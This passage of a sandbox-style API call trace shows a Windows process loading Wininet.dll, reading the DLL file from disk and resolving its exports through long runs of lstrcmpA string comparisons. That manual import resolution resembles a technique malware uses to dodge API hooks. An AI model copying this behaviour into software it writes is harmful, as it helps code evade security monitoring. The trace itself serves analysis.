lpString2="AdjustCalendarDate") returned 1 [0105.540] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0105.540] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0105.540] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0105.540] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0105.540] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0105.540] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0105.541] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0105.542] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0107.386] GetProcessHeap () returned 0x480000 [0107.386] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ac5d0 | out: hHeap=0x480000) returned 1 [0107.386] GetProcessHeap () returned 0x480000 [0107.386] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499320 [0107.386] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0107.603] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0107.603] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0107.604] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0107.604] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0107.604] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0107.605] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0107.605] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0107.605] GetProcessHeap () returned 0x480000 [0107.605] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x286600) returned 0x4079040 [0107.610] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0107.610] ReadFile (in: hFile=0x140, lpBuffer=0x4079040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4079040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0108.195] CloseHandle (hObject=0x140) returned 1 [0108.195] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0108.195] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0108.195] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0108.195] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0108.195] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0108.195] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0108.196] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0108.196] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0108.196] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0108.196] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0108.197] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0108.197] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0108.198] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0108.198] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0108.199] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0108.199] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.200] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0108.201] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0108.201] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0108.202] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0108.203] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0108.203] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", 